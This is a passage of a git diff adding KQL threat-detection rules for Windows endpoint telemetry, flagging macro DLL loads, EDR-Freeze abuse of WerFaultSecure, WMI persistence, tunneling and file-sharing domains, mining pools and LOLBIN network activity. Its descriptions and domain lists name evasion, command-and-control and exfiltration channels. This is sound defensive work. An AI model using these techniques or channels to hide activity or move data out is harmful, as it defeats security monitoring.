+// Tags: attack.execution, attack.t1204.002
+// False Positives:
+//   - Legitimate macro usage. Add the appropriate filter according to your environment
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\VBE7.DLL" or FolderPath endswith "\\VBEUI.DLL" or FolderPath endswith "\\VBE7INTL.DLL") and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/werfaultsecure_loading_dbgcore_or_dbghelp_edr_freeze.kql b/KQL/rules/windows/image_load/werfaultsecure_loading_dbgcore_or_dbghelp_edr_freeze.kql
new file mode 100644
index 00000000..1ed73a09
--- /dev/null
+++ b/KQL/rules/windows/image_load/werfaultsecure_loading_dbgcore_or_dbghelp_edr_freeze.kql
@@ -0,0 +1,13 @@
+// Title: WerFaultSecure Loading DbgCore or DbgHelp - EDR-Freeze
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-27
+// Level: medium
+// Description: Detects WerFaultSecure.exe loading dbgcore.dll or dbghelp.dll which contains the MiniDumpWriteDump function.
+// The MiniDumpWriteDump function creates a minidump of a process by suspending all threads in the target process to ensure a consistent memory snapshot.
+// The EDR-Freeze technique abuses WerFaultSecure.exe running as a Protected Process Light (PPL) with WinTCB protection level to suspend EDR/AV processes.
+// By leveraging MiniDumpWriteDump's thread suspension behavior, edr-freeze allows malicious activity to execute undetected during the suspension period.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\dbghelp.dll") and InitiatingProcessFolderPath endswith "\\WerFaultSecure.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql b/KQL/rules/windows/image_load/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql
new file mode 100644
index 00000000..de812aaa
--- /dev/null
+++ b/KQL/rules/windows/image_load/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql
@@ -0,0 +1,13 @@
+// Title: WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-09-02
+// Level: medium
+// Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.privilege-escalation, attack.persistence, attack.t1546.003
+// False Positives:
+//   - Legitimate event consumers
+//   - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\wbemdisp.dll" or FolderPath endswith "\\wshom.ocx" or FolderPath endswith "\\scrrun.dll") and InitiatingProcessFolderPath endswith "\\scrcons.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/wmi_persistence_command_line_event_consumer.kql b/KQL/rules/windows/image_load/wmi_persistence_command_line_event_consumer.kql
new file mode 100644
index 00000000..467affdb
--- /dev/null
+++ b/KQL/rules/windows/image_load/wmi_persistence_command_line_event_consumer.kql
@@ -0,0 +1,12 @@
+// Title: WMI Persistence - Command Line Event Consumer
+// Author: Thomas Patzke
+// Date: 2018-03-07
+// Level: high
+// Description: Detects WMI command line event consumers
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1546.003, attack.persistence
+// False Positives:
+//   - Unknown (data set is too small; further testing needed)
+
+DeviceImageLoadEvents
+| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe" and FolderPath endswith "\\wbemcons.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql b/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql
new file mode 100644
index 00000000..99e37d51
--- /dev/null
+++ b/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql
@@ -0,0 +1,16 @@
+// Title: WMIC Loading Scripting Libraries
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-17
+// Level: medium
+// Description: Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).
+// It could be an indicator of SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1220
+// False Positives:
+//   - The command wmic os get lastbootuptime loads vbscript.dll
+//   - The command wmic os get locale loads vbscript.dll
+//   - Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights
+//   - The command `wmic ntevent` loads vbscript.dll
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\jscript.dll" or FolderPath endswith "\\vbscript.dll") and InitiatingProcessFolderPath endswith "\\wmic.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/wmiprvse_wbemcomn_dll_hijack.kql b/KQL/rules/windows/image_load/wmiprvse_wbemcomn_dll_hijack.kql
new file mode 100644
index 00000000..b72e7a95
--- /dev/null
+++ b/KQL/rules/windows/image_load/wmiprvse_wbemcomn_dll_hijack.kql
@@ -0,0 +1,10 @@
+// Title: Wmiprvse Wbemcomn DLL Hijack
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-12
+// Level: high
+// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.002
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\wbem\\wbemcomn.dll" and InitiatingProcessFolderPath endswith "\\wmiprvse.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/communication_to_localtonet_tunneling_service_initiated.kql b/KQL/rules/windows/network_connection/communication_to_localtonet_tunneling_service_initiated.kql
new file mode 100644
index 00000000..32346cc3
--- /dev/null
+++ b/KQL/rules/windows/network_connection/communication_to_localtonet_tunneling_service_initiated.kql
@@ -0,0 +1,14 @@
+// Title: Communication To LocaltoNet Tunneling Service Initiated
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2024-06-17
+// Level: high
+// Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains.
+// LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.
+// Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572, attack.t1090, attack.t1102
+// False Positives:
+//   - Legitimate use of the LocaltoNet service.
+
+DeviceNetworkEvents
+| where RemoteUrl endswith ".localto.net" or RemoteUrl endswith ".localtonet.com"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/communication_to_ngrok_tunneling_service_initiated.kql b/KQL/rules/windows/network_connection/communication_to_ngrok_tunneling_service_initiated.kql
new file mode 100644
index 00000000..405d7d7e
--- /dev/null
+++ b/KQL/rules/windows/network_connection/communication_to_ngrok_tunneling_service_initiated.kql
@@ -0,0 +1,14 @@
+// Title: Communication To Ngrok Tunneling Service Initiated
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-11-03
+// Level: high
+// Description: Detects an executable initiating a network connection to "ngrok" tunneling domains.
+// Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
+// While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508
+// False Positives:
+//   - Legitimate use of the ngrok service.
+
+DeviceNetworkEvents
+| where RemoteUrl contains "tunnel.us.ngrok.com" or RemoteUrl contains "tunnel.eu.ngrok.com" or RemoteUrl contains "tunnel.ap.ngrok.com" or RemoteUrl contains "tunnel.au.ngrok.com" or RemoteUrl contains "tunnel.sa.ngrok.com" or RemoteUrl contains "tunnel.jp.ngrok.com" or RemoteUrl contains "tunnel.in.ngrok.com"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/communication_to_uncommon_destination_ports.kql b/KQL/rules/windows/network_connection/communication_to_uncommon_destination_ports.kql
new file mode 100644
index 00000000..bffd61f0
--- /dev/null
+++ b/KQL/rules/windows/network_connection/communication_to_uncommon_destination_ports.kql
@@ -0,0 +1,10 @@
+// Title: Communication To Uncommon Destination Ports
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-03-19
+// Level: medium
+// Description: Detects programs that connect to uncommon destination ports
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.command-and-control, attack.t1571
+
+DeviceNetworkEvents
+| where (RemotePort in~ ("8080", "8888")) and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/local_network_connection_initiated_by_script_interpreter.kql b/KQL/rules/windows/network_connection/local_network_connection_initiated_by_script_interpreter.kql
new file mode 100644
index 00000000..f6a7ead2
--- /dev/null
+++ b/KQL/rules/windows/network_connection/local_network_connection_initiated_by_script_interpreter.kql
@@ -0,0 +1,12 @@
+// Title: Local Network Connection Initiated By Script Interpreter
+// Author: frack113
+// Date: 2022-08-28
+// Level: medium
+// Description: Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+//   - Legitimate scripts
+
+DeviceNetworkEvents
+| where (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) and (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/microsoft_sync_center_suspicious_network_connections.kql b/KQL/rules/windows/network_connection/microsoft_sync_center_suspicious_network_connections.kql
new file mode 100644
index 00000000..79d3d137
--- /dev/null
+++ b/KQL/rules/windows/network_connection/microsoft_sync_center_suspicious_network_connections.kql
@@ -0,0 +1,10 @@
+// Title: Microsoft Sync Center Suspicious Network Connections
+// Author: elhoim
+// Date: 2022-04-28
+// Level: medium
+// Description: Detects suspicious connections from Microsoft Sync Center to non-private IPs.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1055, attack.t1218, attack.execution, attack.defense-evasion
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql b/KQL/rules/windows/network_connection/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql
new file mode 100644
index 00000000..788867e1
--- /dev/null
+++ b/KQL/rules/windows/network_connection/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql
@@ -0,0 +1,12 @@
+// Title: Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2018-08-30
+// Level: high
+// Description: Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+//   - Some installers located in the temp directory might communicate with the Github domains in order to download additional software. Baseline these cases or move the github domain to a lower level hunting rule.
+
+DeviceNetworkEvents
+| where (RemoteUrl endswith ".githubusercontent.com" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "dl.dropboxusercontent.com" or RemoteUrl endswith "ghostbin.co" or RemoteUrl endswith "github.com" or RemoteUrl endswith "glitch.me" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onrender.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "pixeldrain.com" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "storjshare.io" or RemoteUrl endswith "supabase.co" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "workers.dev") and (InitiatingProcessFolderPath contains ":\\$Recycle.bin" or InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Default\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Fonts\\" or InitiatingProcessFolderPath contains ":\\Windows\\IME\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Temp\\" or InitiatingProcessFolderPath contains "\\config\\systemprofile\\" or InitiatingProcessFolderPath contains "\\Windows\\addins\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_communication_initiated_to_portmap_io_domain.kql b/KQL/rules/windows/network_connection/network_communication_initiated_to_portmap_io_domain.kql
new file mode 100644
index 00000000..2a539c84
--- /dev/null
+++ b/KQL/rules/windows/network_connection/network_communication_initiated_to_portmap_io_domain.kql
@@ -0,0 +1,12 @@
+// Title: Network Communication Initiated To Portmap.IO Domain
+// Author: Florian Roth (Nextron Systems)
+// Date: 2024-05-31
+// Level: medium
+// Description: Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors
+// MITRE Tactic: Command and Control
+// Tags: attack.t1041, attack.command-and-control, attack.t1090.002, attack.exfiltration
+// False Positives:
+//   - Legitimate use of portmap.io domains
+
+DeviceNetworkEvents
+| where RemoteUrl endswith ".portmap.io"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_communication_with_crypto_mining_pool.kql b/KQL/rules/windows/network_connection/network_communication_with_crypto_mining_pool.kql
new file mode 100644
index 00000000..eaba9eb0
--- /dev/null
+++ b/KQL/rules/windows/network_connection/network_communication_with_crypto_mining_pool.kql
@@ -0,0 +1,12 @@
+// Title: Network Communication With Crypto Mining Pool
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-10-26
+// Level: high
+// Description: Detects initiated network connections to crypto mining pools
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1496
+// False Positives:
+//   - Unlikely
+
+DeviceNetworkEvents
+| where RemoteUrl in~ ("alimabi.cn", "ap.luckpool.net", "bcn.pool.minergate.com", "bcn.vip.pool.minergate.com", "bohemianpool.com", "ca-aipg.miningocean.org", "ca-dynex.miningocean.org", "ca-neurai.miningocean.org", "ca-qrl.miningocean.org", "ca-upx.miningocean.org", "ca-zephyr.miningocean.org", "ca.minexmr.com", "ca.monero.herominers.com", "cbd.monerpool.org", "cbdv2.monerpool.org", "cryptmonero.com", "crypto-pool.fr", "crypto-pool.info", "cryptonight-hub.miningpoolhub.com", "d1pool.ddns.net", "d5pool.us", "daili01.monerpool.org", "de-aipg.miningocean.org", "de-dynex.miningocean.org", "de-zephyr.miningocean.org", "de.minexmr.com", "dl.nbminer.com", "donate.graef.in", "donate.ssl.xmrig.com", "donate.v2.xmrig.com", "donate.xmrig.com", "donate2.graef.in", "drill.moneroworld.com", "dwarfpool.com", "emercoin.com", "emercoin.net", "emergate.net", "ethereumpool.co", "eu.luckpool.net", "eu.minerpool.pw", "fcn-xmr.pool.minergate.com", "fee.xmrig.com", "fr-aipg.miningocean.org", "fr-dynex.miningocean.org", "fr-neurai.miningocean.org", "fr-qrl.miningocean.org", "fr-upx.miningocean.org", "fr-zephyr.miningocean.org", "fr.minexmr.com", "hellominer.com", "herominers.com", "hk-aipg.miningocean.org", "hk-dynex.miningocean.org", "hk-neurai.miningocean.org", "hk-qrl.miningocean.org", "hk-upx.miningocean.org", "hk-zephyr.miningocean.org", "huadong1-aeon.ppxxmr.com", "iwanttoearn.money", "jw-js1.ppxxmr.com", "koto-pool.work", "lhr.nbminer.com", "lhr3.nbminer.com", "linux.monerpool.org", "lokiturtle.herominers.com", "luckpool.net", "masari.miner.rocks", "mine.c3pool.com", "mine.moneropool.com", "mine.ppxxmr.com", "mine.zpool.ca", "mine1.ppxxmr.com", "minemonero.gq", "miner.ppxxmr.com", "miner.rocks", "minercircle.com", "minergate.com", "minerpool.pw", "minerrocks.com", "miners.pro", "minerxmr.ru", "minexmr.cn", "minexmr.com", "mining-help.ru", "miningpoolhub.com", "mixpools.org", "moner.monerpool.org", "moner1min.monerpool.org", "monero-master.crypto-pool.fr", "monero.crypto-pool.fr", "monero.hashvault.pro", "monero.herominers.com", "monero.lindon-pool.win", "monero.miners.pro", "monero.riefly.id", "monero.us.to", "monerocean.stream", "monerogb.com", "monerohash.com", "moneroocean.stream", "moneropool.com", "moneropool.nl", "monerorx.com", "monerpool.org", "moriaxmr.com", "mro.pool.minergate.com", "multipool.us", "myxmr.pw", "na.luckpool.net", "nanopool.org", "nbminer.com", "node3.luckpool.net", "noobxmr.com", "pangolinminer.comgandalph3000.com", "pool.4i7i.com", "pool.armornetwork.org", "pool.cortins.tk", "pool.gntl.co.uk", "pool.hashvault.pro", "pool.minergate.com", "pool.minexmr.com", "pool.monero.hashvault.pro", "pool.ppxxmr.com", "pool.somec.cc", "pool.support", "pool.supportxmr.com", "pool.usa-138.com", "pool.xmr.pt", "pool.xmrfast.com", "pool2.armornetwork.org", "poolchange.ppxxmr.com", "pooldd.com", "poolmining.org", "poolto.be", "ppxvip1.ppxxmr.com", "ppxxmr.com", "prohash.net", "r.twotouchauthentication.online", "randomx.xmrig.com", "ratchetmining.com", "seed.emercoin.com", "seed.emercoin.net", "seed.emergate.net", "seed1.joulecoin.org", "seed2.joulecoin.org", "seed3.joulecoin.org", "seed4.joulecoin.org", "seed5.joulecoin.org", "seed6.joulecoin.org", "seed7.joulecoin.org", "seed8.joulecoin.org", "sg-aipg.miningocean.org", "sg-dynex.miningocean.org", "sg-neurai.miningocean.org", "sg-qrl.miningocean.org", "sg-upx.miningocean.org", "sg-zephyr.miningocean.org", "sg.minexmr.com", "sheepman.mine.bz", "siamining.com", "sumokoin.minerrocks.com", "supportxmr.com", "suprnova.cc", "teracycle.net", "trtl.cnpool.cc", "trtl.pool.mine2gether.com", "turtle.miner.rocks", "us-aipg.miningocean.org", "us-dynex.miningocean.org", "us-neurai.miningocean.org", "us-west.minexmr.com", "us-zephyr.miningocean.org", "usxmrpool.com", "viaxmr.com", "webservicepag.webhop.net", "xiazai.monerpool.org", "xiazai1.monerpool.org", "xmc.pool.minergate.com", "xmo.pool.minergate.com", "xmr-asia1.nanopool.org", "xmr-au1.nanopool.org", "xmr-eu1.nanopool.org", "xmr-eu2.nanopool.org", "xmr-jp1.nanopool.org", "xmr-us-east1.nanopool.org", "xmr-us-west1.nanopool.org", "xmr-us.suprnova.cc", "xmr-usa.dwarfpool.com", "xmr.2miners.com", "xmr.5b6b7b.ru", "xmr.alimabi.cn", "xmr.bohemianpool.com", "xmr.crypto-pool.fr", "xmr.crypto-pool.info", "xmr.f2pool.com", "xmr.hashcity.org", "xmr.hex7e4.ru", "xmr.ip28.net", "xmr.monerpool.org", "xmr.mypool.online", "xmr.nanopool.org", "xmr.pool.gntl.co.uk", "xmr.pool.minergate.com", "xmr.poolto.be", "xmr.ppxxmr.com", "xmr.prohash.net", "xmr.simka.pw", "xmr.somec.cc", "xmr.suprnova.cc", "xmr.usa-138.com", "xmr.vip.pool.minergate.com", "xmr1min.monerpool.org", "xmrf.520fjh.org", "xmrf.fjhan.club", "xmrfast.com", "xmrigcc.graef.in", "xmrminer.cc", "xmrpool.de", "xmrpool.eu", "xmrpool.me", "xmrpool.net", "xmrpool.xyz", "xx11m.monerpool.org", "xx11mv2.monerpool.org", "xxx.hex7e4.ru", "zarabotaibitok.ru", "zer0day.ru")
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_by_addinutil_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_by_addinutil_exe.kql
new file mode 100644
index 00000000..3b1ea25d
--- /dev/null
+++ b/KQL/rules/windows/network_connection/network_connection_initiated_by_addinutil_exe.kql
@@ -0,0 +1,11 @@
+// Title: Network Connection Initiated By AddinUtil.EXE
+// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
+// Date: 2023-09-18
+// Level: high
+// Description: Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe".
+// This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\addinutil.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_by_eqnedt32_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_by_eqnedt32_exe.kql
new file mode 100644
index 00000000..4ffa0cdd
--- /dev/null
+++ b/KQL/rules/windows/network_connection/network_connection_initiated_by_eqnedt32_exe.kql
@@ -0,0 +1,12 @@
+// Title: Network Connection Initiated By Eqnedt32.EXE
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2022-04-14
+// Level: high
+// Description: Detects network connections from the Equation Editor process "eqnedt32.exe".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203
+// False Positives:
+//   - Unlikely
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\eqnedt32.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_by_imewdbld_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_by_imewdbld_exe.kql
new file mode 100644
index 00000000..d7c11ee2
--- /dev/null
+++ b/KQL/rules/windows/network_connection/network_connection_initiated_by_imewdbld_exe.kql
@@ -0,0 +1,10 @@
+// Title: Network Connection Initiated By IMEWDBLD.EXE
+// Author: frack113
+// Date: 2022-01-22
+// Level: high
+// Description: Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\IMEWDBLD.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_by_regsvr32_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_by_regsvr32_exe.kql
new file mode 100644
index 00000000..247bc43b
--- /dev/null
+++ b/KQL/rules/windows/network_connection/network_connection_initiated_by_regsvr32_exe.kql
@@ -0,0 +1,10 @@
+// Title: Network Connection Initiated By Regsvr32.EXE
+// Author: Dmitriy Lifanov, oscd.community
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects a network connection initiated by "Regsvr32.exe"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1559.001, attack.defense-evasion, attack.t1218.010
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\regsvr32.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql b/KQL/rules/windows/network_connection/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql
new file mode 100644
index 00000000..4594e5e1
--- /dev/null
+++ b/KQL/rules/windows/network_connection/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql
@@ -0,0 +1,10 @@
+// Title: Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2017-03-19
+// Level: high
+// Description: Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceNetworkEvents
+| where (InitiatingProcessFolderPath contains ":\\$Recycle.bin" or InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Default\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Fonts\\" or InitiatingProcessFolderPath contains ":\\Windows\\IME\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Tasks\\" or InitiatingProcessFolderPath contains "\\config\\systemprofile\\" or InitiatingProcessFolderPath contains "\\Contacts\\" or InitiatingProcessFolderPath contains "\\Favorites\\" or InitiatingProcessFolderPath contains "\\Favourites\\" or InitiatingProcessFolderPath contains "\\Music\\" or InitiatingProcessFolderPath contains "\\Pictures\\" or InitiatingProcessFolderPath contains "\\Videos\\" or InitiatingProcessFolderPath contains "\\Windows\\addins\\") and (not((RemoteUrl endswith ".githubusercontent.com" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "dl.dropboxusercontent.com" or RemoteUrl endswith "ghostbin.co" or RemoteUrl endswith "github.com" or RemoteUrl endswith "glitch.me" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onrender.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "portmap.io" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "storjshare.io" or RemoteUrl endswith "supabase.co" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "workers.dev")))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql
new file mode 100644
index 00000000..75b2be6b
--- /dev/null
+++ b/KQL/rules/windows/network_connection/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql
@@ -0,0 +1,10 @@
+// Title: Network Connection Initiated To AzureWebsites.NET By Non-Browser Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-06-24
+// Level: medium
+// Description: Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102, attack.t1102.001
+
+DeviceNetworkEvents
